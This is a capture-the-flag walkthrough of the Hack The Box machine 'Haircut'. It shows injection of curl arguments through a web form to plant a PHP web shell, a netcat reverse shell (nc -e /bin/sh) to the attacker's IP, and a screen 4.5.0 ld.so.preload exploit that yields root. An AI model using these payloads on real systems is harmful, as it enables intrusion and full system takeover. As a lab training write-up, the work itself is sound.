Hack the Box – Haircut Walkthrough

Today we’re going to solve another CTF machine “Haircut”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

• Target OS: Linux
• Services: SSH, HTTP
• IP Address: 10.10.10.24
• Difficulty: Easy

Weakness

• Curl Command
• SUID Screen 4.5

Contents

• Getting user
• Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

We just found these two ports opened after doing intense scan for TCP and UDP port scanning. So what do we next is enumerate running services.

Enumerate Directories 

There’s different tools for directories enumerating but my favorite one is dirbuster.

Using lowercase medium wordlist we found and exposed.php file and upload directory.

Let’s take a look at exposed.php file.

There’s a input field where you can enter URL and press go let’s take a look what it dose.

Let’s take a look at the request and response in burp suite.

Request

POST /exposed.php HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.24/exposed.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

formurl=http://localhost/test.html&submit=Go

Response

HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Thu, 29 Nov 2018 19:05:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1011

<html>
	<head>
		<title>Hairdresser checker</title>
	</head>
	<body>
	<form action='exposed.php' method='POST'>
		<span>
		<p>
		Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html
		</p>
		</span>
		<input type='text' name='formurl' id='formurl' width='50' value='http://localhost/test.html'/>
		<input type='submit' name='submit' value='Go' id='submit' />
	</form>
	<span>
		<p>Requesting Site...</p>  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100   223  100   223    0     0   167k      0 --:--:-- --:--:-- --:--:--  217k
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <body>
	<img src='carrie.jpg'></img>
  </body>
</html>
	</span>
	</body>
</html>

I know that it is running curl command because of the structure of the response. But it also hints about curl inside carrie,jpg picture where it says CARRIE CURL.

We know what curl can do 🙂

Exploitation

We can use curl to upload our shell inside uploads directory which we found during enumerating directories.

Let’s create a php reverse shell 1337.php

1337.php

https://gist.github.com/sente/4dbb2b7bdda2647ba80b

Now we have to run python HTTP server to upload our 1337.php file through curl.

python -m SimpleHTTPServer

Now we have to upload our shell inside upload directory. Since we know the default apache path /var/www/html/uploads let’s use curl parameter -o to output file 1337.php inside uploads directory.

-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php

Request

POST /exposed.php HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.24/exposed.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

formurl=-o /var/www/html/uploads/1337.php http://10.10.14.4:8000/1337.php&submit=Go

Now our php shell is successfully uploaded inside uploads directory.

Let’s access our shell through browser or burp.

Request 1337.php?cmd=ls

GET /uploads/1337.php?cmd=ls HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Thu, 29 Nov 2018 20:24:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31

<pre>1337.php
bounce.jpg
</pre>

Now it’s time to get proper reverse shell using netcat.

GET /uploads/1337.php?cmd=nc -e /bin/sh 10.10.14.4 1337 HTTP/1.1
Host: 10.10.10.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

And we got shell.

Privilege Escalation

After getting user access we move forward by running some scripts which help us to go through some important information which can lead to root.

Before running scripts i do some manual research and testing so this time i found an uncommon SUID file.

The first thing i did is ran this command.

find / -perm -4000 2>/dev/null

And found this uncommon file /usr/bin/screen-4.5.0 which we don’t see here. Upon doing google search we found an exploit.

GCC is broken on target machine so we have to compile them locally.

let’s compile.

gcc -fPIC -shared -ldl -o libhax.so libhax.c

Let’s upload compiled c programs to our targeted machine inside /tmp.

Let’s move further.

[email protected]:/tmp$ cd /etc
cd /etc
[email protected]:/etc$ ls -la |grep ld
ls -la |grep ld
-rw-r--r--   1 root root   24939 May 19  2017 ld.so.cache
-rw-r--r--   1 root root      34 Jan 27  2016 ld.so.conf
drwxr-xr-x   2 root root    4096 May 16  2017 ld.so.conf.d
drwxr-xr-x   2 root root    4096 May 15  2017 ldap

[email protected]:/etc$ umask 000
umask 000
[email protected]:/etc$ screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
<en -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"                    
[email protected]:/etc$ screen -ls
screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

[email protected]:/etc$ /tmp/rootshell
/tmp/rootshell
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)